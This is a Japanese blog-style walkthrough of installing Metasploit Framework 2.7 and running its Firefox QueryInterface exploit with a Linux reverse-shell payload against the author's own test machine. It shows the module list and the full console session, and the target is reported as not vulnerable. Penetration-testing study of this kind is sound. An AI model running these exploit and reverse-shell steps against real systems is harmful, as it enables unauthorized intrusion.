このツールは、非常に良くできていて正直俺は脱帽だ。オフィシャルサイトは、 ここ である。
インスコは、非常に簡単。 ここ にWindows版とUnix版の両方が置いてあるので好みの方をインスコされたい。2007年1月現在でバージョン2.7を使ったが、ベータ版だがバージョン3.0も有る。どうも、バージョン3系はRubyで書き直して有るらしい。
[root@infosystem ~]# cd /usr/local/src/
[root@infosystem src]# wget http://www.metasploit.com/tools/framework-2.7.tar.gz
[root@infosystem src]# tar zxvf framework-2.7.tar.gz
[root@infosystem src]# cd framework-2.7
Windows版のmetasploitのインスコは、ダウンロードした framework-2.7.exe を実行すればインスコが始まる。

攻撃される側: VineLinux
攻撃仕掛ける側: Debian/GNU Linux
[root@infosystem framework-2.7]# perl msfconsole
Using Term::ReadLine::Stub, I suggest installing something better (ie Term::ReadLine::Gnu)
__. .__. .__. __.
_____ _____/ |______ ____________ | | ____ |__|/ |_
/ \_/ __ \ __\__ \ / ___/\____ \| | / _ \| \ __\
| Y Y \ ___/| | / __ \_\___ \ | |_> > |_( <_> ) || |
|__|_| /\___ >__| (____ /____ >| __/|____/\____/|__||__|
\/ \/ \/ \/ |__|
+ -- --=[ msfconsole v2.7 [157 exploits - 76 payloads]
msf > show exploits ← 脆弱性検証メニューを表示させる。
Metasploit Framework Loaded Exploits
3com_3cdaemon_ftp_overflow 3Com 3CDaemon FTP Server Overflow
Credits Metasploit Framework Credits
afp_loginext AppleFileServer LoginExt PathName Overflow
aim_goaway AOL Instant Messenger goaway Overflow
altn_webadmin Alt-N WebAdmin USER Buffer Overflow
apache_chunked_win32 Apache Win32 Chunked Encoding
arkeia_agent_access Arkeia Backup Client Remote Access
arkeia_type77_macos Arkeia Backup Client Type 77 Overflow (Mac OS X)
arkeia_type77_win32 Arkeia Backup Client Type 77 Overflow (Win32)
awstats_configdir_exec AWStats configdir Remote Command Execution
backupexec_agent Veritas Backup Exec Windows Remote Agent Overflow
backupexec_dump Veritas Backup Exec Windows Remote File Access
backupexec_ns Veritas Backup Exec Name Service Overflow
backupexec_registry Veritas Backup Exec Server Registry Access
badblue_ext_overflow BadBlue 2.5 EXT.dll Buffer Overflow
bakbone_netvault_heap BakBone NetVault Remote Heap Overflow
barracuda_img_exec Barracuda IMG.PL Remote Command Execution
blackice_pam_icq ISS PAM.dll ICQ Parser Buffer Overflow
bluecoat_winproxy Blue Coat Systems WinProxy Host Header Buffer Overflow
bomberclone_overflow_win32 Bomberclone 0.11.6 Buffer Overflow
cabrightstor_disco CA BrightStor Discovery Service Overflow
cabrightstor_disco_servicepc CA BrightStor Discovery Service SERVICEPC Overflow
cabrightstor_sqlagent CA BrightStor Agent for Microsoft SQL Overflow
cabrightstor_uniagent CA BrightStor Universal Agent Overflow
cacam_logsecurity_win32 CA CAM log_security() Stack Overflow (Win32)
cacti_graphimage_exec Cacti graph_image.php Remote Command Execution
calicclnt_getconfig CA License Client GETCONFIG Overflow
calicserv_getconfig CA License Server GETCONFIG Overflow
cesarftp_mkd Cesar FTP 0.99g MKD Command Buffer Overflow
distcc_exec DistCC Daemon Command Execution
edirectory_imonitor eDirectory 8.7.3 iMonitor Remote Stack Overflow
edirectory_imonitor2 eDirectory 8.8 iMonitor Remote Stack Overflow
eiq_license EIQ License Manager Overflow
eudora_imap Qualcomm WorldMail IMAPD Server Buffer Overflow
exchange2000_xexch50 Exchange 2000 MS03-46 Heap Overflow
firefox_queryinterface_linux Firefox location.QueryInterface() Code Execution (Linux x86)
firefox_queryinterface_osx Firefox location.QueryInterface() Code Execution (Mac OS X)
freeftpd_key_exchange FreeFTPd 1.0.10 Key Exchange Algorithm Buffer Overflow
freeftpd_user freeFTPd USER Overflow
freesshd_key_exchange FreeSSHd 1.0.9 Key Exchange Algorithm String Buffer Overflow
futuresoft_tftpd FutureSoft TFTP Server 2000 Buffer Overflow
globalscapeftp_user_input GlobalSCAPE Secure FTP Server user input overflow
gnu_mailutils_imap4d GNU Mailutils imap4d Format String Vulnerability
google_proxystylesheet_exec Google Appliance ProxyStyleSheet Command Execution
hpux_ftpd_preauth_list HP-UX FTP Server Preauthentication Directory Listing
hpux_lpd_exec HP-UX LPD Command Execution
ia_webmail IA WebMail 3.x Buffer Overflow
icecast_header Icecast (<= 2.0.1) Header Overwrite (win32)
ie_createobject Internet Explorer COM CreateObject Code Execution
ie_createtextrange Internet Explorer createTextRange() Code Execution
ie_iscomponentinstalled Windows XP SP0 IE 6.0 IsComponentInstalled() Overflow
ie_objecttype Internet Explorer Object Type Overflow
ie_vml_rectfill Internet Explorer VML Fill Method Code Execution
ie_webview_setslice Internet Explorer WebViewFolderIcon setSlice() Code Execution
ie_xp_pfv_metafile Windows XP/2003/Vista Metafile Escape() SetAbortProc Code Execution
iis40_htr IIS 4.0 .HTR Buffer Overflow
iis50_printer_overflow IIS 5.0 Printer Buffer Overflow
iis50_webdav_ntdll IIS 5.0 WebDAV ntdll.dll Overflow
iis_fp30reg_chunked IIS FrontPage fp30reg.dll Chunked Overflow
iis_nsiislog_post IIS nsiislog.dll ISAPI POST Overflow
iis_source_dumper IIS Web Application Source Code Disclosure
iis_w3who_overflow IIS w3who.dll ISAPI Overflow
imail_imap_delete IMail IMAP4D Delete Overflow
imail_ldap IMail LDAP Service Buffer Overflow
irix_lpsched_exec IRIX lpsched Command Execution
kerio_auth Kerio Personal Firewall 2 (2.1.4) Remote Auth Packet Overflow
lsass_ms04_011 Microsoft LSASS MSO4-011 Overflow
lyris_attachment_mssql Lyris ListManager Attachment SQL Injection (MSSQL)
mailenable_auth_header MailEnable Authorization Header Buffer Overflow
mailenable_imap MailEnable Pro (1.54) IMAP STATUS Request Buffer Overflow
mailenable_imap_w3c MailEnable IMAPD W3C Logging Buffer Overflow
maxdb_webdbm_get_overflow MaxDB WebDBM GET Buffer Overflow
mcafee_epolicy_source McAfee ePolicy Orchestrator / ProtPilot Source Overflow
mdaemon_imap_cram_md5 Mdaemon 8.0.3 IMAPD CRAM-MD5 Authentication Overflow
mercantec_softcart Mercantec SoftCart CGI Overflow
mercur_imap_select_overflow Mercur v5.0 IMAP SP3 SELECT Buffer Overflow
mercury_imap Mercury/32 v4.01a IMAP RENAME Buffer Overflow
minishare_get_overflow Minishare 1.4.1 Buffer Overflow
mozilla_compareto Mozilla Suite/Firefox InstallVersion->compareTo() Code Execution
ms05_030_nntp Microsoft Outlook Express NNTP Response Overflow
ms05_039_pnp Microsoft PnP MS05-039 Overflow
msasn1_ms04_007_killbill Microsoft ASN.1 Library Bitstring Heap Overflow
msmq_deleteobject_ms05_017 Microsoft Message Queueing Service MSO5-017
msrpc_dcom_ms03_026 Microsoft RPC DCOM MSO3-026
mssql2000_preauthentication MSSQL 2000/MSDE Hello Buffer Overflow
mssql2000_resolution MSSQL 2000/MSDE Resolution Overflow
netapi_ms06_040 Microsoft CanonicalizePathName() MSO6-040 Overflow
netterm_netftpd_user_overflow NetTerm NetFTPD USER Buffer Overflow
niprint_lpd NIPrint LPD Request Overflow
novell_messenger_acceptlang Novell Messenger Server 2.0 Accept-Language Overflow
openview_connectednodes_exec HP Openview connectedNodes.ovpl Remote Command Execution
openview_omniback HP OpenView Omniback II Command Execution
oracle9i_xdb_ftp Oracle 9i XDB FTP UNLOCK Overflow (win32)
oracle9i_xdb_ftp_pass Oracle 9i XDB FTP PASS Overflow (win32)
oracle9i_xdb_http Oracle 9i XDB HTTP PASS Overflow (win32)
pajax_remote_exec PAJAX Remote Command Execution
payload_handler Metasploit Framework Payload Handler
peercast_url_linux PeerCast <= 0.1216 URL Handling Buffer Overflow (Linux)
peercast_url_win32 PeerCast <= 0.1216 URL Handling Buffer Overflow(win32)
php_vbulletin_template vBulletin misc.php Template Name Arbitrary Code Execution
php_wordpress_lastpost WordPress cache_lastpostdate Arbitrary Code Execution
php_xmlrpc_eval PHP XML-RPC Arbitrary Code Execution
phpbb_highlight phpBB viewtopic.php Arbitrary Code Execution
phpnuke_search_module PHPNuke Search Module SQL Injection Vulnerability
poptop_negative_read Poptop Negative Read Overflow
privatewire_gateway_win32 Private Wire Gateway Buffer Overflow (win32)
putty_ssh PuTTy.exe <= v0.53 Buffer Overflow
realserver_describe_linux RealServer Describe Buffer Overflow
realvnc_41_bypass RealVNC 4.1 Authentication Bypass
realvnc_client RealVNC 3.3.7 Client Buffer Overflow
rras_ms06_025 Microsoft RRAS MSO6-025 Stack Overflow
rras_ms06_025_rasman Microsoft RRAS MSO6-025 RASMAN Registry Stack Overflow
rsa_iiswebagent_redirect IIS RSA WebAgent Redirect Overflow
safari_safefiles_exec Safari Archive Metadata Command Execution
samba_nttrans Samba Fragment Reassembly Overflow
samba_trans2open Samba trans2open Overflow
samba_trans2open_osx Samba trans2open Overflow (Mac OS X)
samba_trans2open_solsparc Samba trans2open Overflow (Solaris SPARC)
sambar6_search_results Sambar 6 Search Results Buffer Overflow
seattlelab_mail_55 Seattle Lab Mail 5.5 POP3 Buffer Overflow
securecrt_ssh1 SecureCRT <= 4.0 Beta 2 SSH1 Buffer Overflow
sentinel_lm7_overflow SentinelLM UDP Buffer Overflow
servu_mdtm_overflow Serv-U FTPD MDTM Overflow
shixxnote_font ShixxNOTE 6.net Font Buffer Overflow
shoutcast_format_win32 SHOUTcast DNAS/win32 1.9.4 File Request Format String Overflow
slimftpd_list_concat SlimFTPd LIST Concatenation Overflow
smb_sniffer SMB Password Capture Service
solaris_dtspcd_noir Solaris dtspcd Heap Overflow
solaris_kcms_readfile Solaris KCMS Arbitary File Read
solaris_lpd_exec Solaris LPD Command Execution
solaris_lpd_unlink Solaris LPD Arbitrary File Delete
solaris_sadmind_exec Solaris sadmind Command Execution
solaris_snmpxdmid Solaris snmpXdmid AddComponent Overflow
solaris_ttyprompt Solaris in.telnetd TTYPROMPT Buffer Overflow
sphpblog_file_upload Simple PHP Blog remote command execution
squid_ntlm_authenticate Squid NTLM Authenticate Overflow
svnserve_date Subversion Date Svnserve
sybase_easerver Sybase EAServer 5.2 Remote Stack Overflow
sygate_policy_manager Sygate Management Server SQL Injection
tftpd32_long_filename TFTPD32 <= 2.21 Long Filename Buffer Overflow
trackercam_phparg_overflow TrackerCam PHP Argument Buffer Overflow
ultravnc_client UltraVNC 1.0.1 Client Buffer Overflow
uow_imap4_copy University of Washington IMAP4 COPY Overflow
uow_imap4_lsub University of Washington IMAP4 LSUB Overflow
ut2004_secure_linux Unreal Tournament 2004 "secure" Overflow (Linux)
ut2004_secure_win32 Unreal Tournament 2004 "secure" Overflow (Win32)
warftpd_165_pass War-FTPD 1.65 PASS Overflow
warftpd_165_user War-FTPD 1.65 USER Overflow
webstar_ftp_user WebSTAR FTP Server USER Overflow
winamp_playlist_unc Winamp Playlist UNC Path Computer Name Overflow
windows_ssl_pct Microsoft SSL PCT MS04-011 Overflow
wins_ms04_045 Microsoft WINS MS04-045 Code Execution
wmailserver_smtp SoftiaCom WMailserver 1.0 SMTP Buffer Overflow
wsftp_server_503_mkd WS-FTP Server 5.03 MKD Overflow
wzdftpd_site Wzdftpd SITE Command Arbitrary Command Execution
ypops_smtp YahooPOPS! <= 0.6 SMTP Buffer Overflow
zenworks_desktop_agent ZENworks 6.5 Desktop/Server Management Remote Stack Overflow
一見すると解ってもらえると思うが、ほとんどがWindowsの脆弱性だ。Linuxの脆弱性と言えば、show exploitsコマンドでWebブラウザの脆弱性を突く攻撃とかである。
そこで、ここでのexploitは、[firefox_queryinterface_linux Firefox location.QueryInterface() Code Execution (Linux x86)]についての脆弱性を突いて検証してみる。
firefox_queryinterface_linuxの意味は、「LinuxのFirefoxでLocation および Navigator オブジェクト上での QueryInterface を使ったメモリ破壊」つまり、組み込みオブジェクトのLocationおよびNavigatorでQueryInterfaceメソッドを呼び出すと、任意のプログラムを実行できるようなメモリー破壊が発生すると言う問題である。
msf > use firefox_queryinterface_linux ←目的のExploitを設定する。
msf firefox_queryinterface_linux > show payloads ←どのようなPAYLOADで相手を攻撃するかを選ぶ。
Metasploit Framework Usable Payloads
linux_ia32_exec Linux IA32 Execute Command
linux_ia32_reverse Linux IA32 Reverse Shell
linux_ia32_reverse_impurity Linux IA32 Reverse Impurity Upload/Execute
linux_ia32_reverse_stg Linux IA32 Staged Reverse Shell
linux_ia32_reverse_udp Linux IA32 Reverse UDP Shell
msf firefox_queryinterface_linux > set PAYLOAD linux_ia32_reverse ←PAYLOADを設定する。
PAYLOAD -> linux_ia32_reverse
msf firefox_queryinterface_linux(linux_ia32_reverse) > show options ←オプショナルのパラメータを選ぶ。
Exploit and Payload Options
Exploit: Name Default Description
——– ——– ——- —————————-
optional HTTPHOST The local HTTP listener host
required HTTPPORT 8080 The local HTTP listener port
Payload: Name Default Description
——– —— ——- ———————————–
required LHOST Local address to receive connection
required LPORT 4321 Local port to receive connection
Target: Mozilla Firefox on Linux x86
msf firefox_queryinterface_linux(linux_ia32_reverse) > set LHOST ←LHOSTで攻撃仕掛ける側(のIPアドレスを設定する。
msf firefox_queryinterface_linux(linux_ia32_reverse) > set ←設定状態の確認。
PAYLOAD: linux_ia32_reverse
msf firefox_queryinterface_linux(linux_ia32_reverse) > exploit ←攻撃開始。
[*] Starting Reverse Handler.
[*] Waiting for connections to
攻撃される側(が にアクセスしてくる。
[*] Client connected from (Linux/Not Vulnerable).
[*] Sending payload and waiting for execution…
[*] Exiting Reverse Handler.